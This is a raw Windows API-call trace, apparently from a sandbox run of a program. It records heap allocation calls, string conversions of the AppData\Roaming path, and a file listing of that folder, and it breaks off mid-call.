[0112.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0112.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x52) returned 0x2a5fb40 [0112.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9850 [0112.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy/AppData/Roaming", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0112.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0112.011] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy/AppData/Roaming", cchWideChar=32, lpMultiByteStr=0x2a77d00, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\FD1HVy/AppData/Roaming", lpUsedDefaultChar=0x0) returned 32 [0112.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0112.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0112.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0112.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0112.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0112.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0112.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0112.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0112.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0112.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0112.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0112.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0112.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0112.012] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2a77b70, cbMultiByte=32, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 32 [0112.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0112.012] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2a77b70, cbMultiByte=32, lpWideCharStr=0x2a5dfa8, cchWideChar=32 | out: lpWideCharStr="C:\\Users\\FD1HVy/AppData/Roaming") returned 32 [0112.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0112.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74628 [0112.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0112.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0112.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0112.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74628 | out: hHeap=0x2af0000) returned 1 [0112.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0112.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0112.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0112.013] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0112.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5fb40 | out: hHeap=0x2af0000) returned 1 [0112.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0112.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0112.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0112.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0112.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0112.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0112.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0112.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0112.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0112.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0112.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0112.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0112.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0112.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0112.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0112.014] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a684c8 [0112.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0112.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0112.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0112.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0112.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0112.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0112.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0112.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0112.015] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0112.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0112.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0112.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0112.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0112.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0112.015] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0112.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0112.015] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming\\" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0112.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0112.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0112.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0112.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0112.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0112.324] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0112.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0112.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0112.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0112.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0112.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0112.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0112.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0112.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0112.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0112.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0112.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0112.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0112.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0112.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0112.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0112.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0112.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0112.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17) returned 0x29f7020 [0112.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x29f7020, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", lpUsedDefaultChar=0x0) returned 23 [0112.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0112.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0112.325] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0112.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x59) returned 0x2a74958 [0112.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96e8 [0112.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0112.325] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0112.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="*.*", cchWideChar=4, lpMultiByteStr=0x2a72748, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*.*", lpUsedDefaultChar=0x0) returned 4 [0112.326] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0112.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0112.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0112.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0112.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0112.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0112.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0112.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0112.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0112.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0112.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0112.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0112.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0112.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0112.327] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0112.327] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0112.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0112.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0112.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0112.327] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0112.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0112.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0112.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0112.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0112.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0112.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0112.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0112.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0112.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0112.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0112.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0112.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0112.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0112.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0112.328] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0112.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0112.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0112.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0112.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0112.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0112.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0112.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0112.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0112.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0112.328] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eabe0 [0112.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0112.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0112.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0112.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0112.329] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming\\*.*", lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3a332969, ftLastAccessTime.dwHighDateTime=0x1d5d816, ftLastWriteTime.dwLowDateTime=0x3a332969, ftLastWriteTime.dwHighDateTime=0x1d5d816, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf2d0, cFileName=".", cAlternateFileName="")) returned 0x9a4440 [0112.481] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3a332969, ftLastAccessTime.dwHighDateTime=0x1d5d816, ftLastWriteTime.dwLowDateTime=0x3a332969, ftLastWriteTime.dwHighDateTime=0x1d5d816, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf2d0, cFileName="..", cAlternateFileName="")) returned 1 [0112.481] FindNextFileW (in: hFindFile=0x9a4440, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3294e10, ftCreationTime.dwHighDateTime=0x1d5cfb0, ftLastAccessTime.dwLowDateTime=0x93ca8640, ftLastAccessTime.dwHighDateTime=0x1d5cdd1, ftLastWriteTime.dwLowDateTime=0x93ca8640, ftLastWriteTime.dwHighDateTime=0x1d5cdd1, nFileSizeHigh=0x0, nFileSizeLow=0x15075, dwReserved0=0x2af0000, dwReserved1=0x8cf2d0, cFileName="-M_4r.mp4", cAlternateFileName="")) returned 1 [0112.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6e80 [0112.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7060 [0112.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eabe0 | out: hHeap=0x2af0000) returned 1 [0112.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0112.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0112.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0112.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0112.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0112.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0112.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0112.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0112.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0112.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0112.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0112.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0112.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0112.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0112.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0112.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0112.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0112.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0112.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0112.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0112.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0112.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0112.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0112.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0112.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0112.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0112.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0112.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0112.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0112.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0112.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0112.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0112.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0112.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0112.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0112.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0112.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0112.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0112.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0112.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0112.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0112.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0112.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0112.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0112.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0112.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0112.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0112.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0112.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0112.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0112.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0112.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0112.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0112.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0112.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0112.483] HeapFree (in: hHeap=0x2af0000, 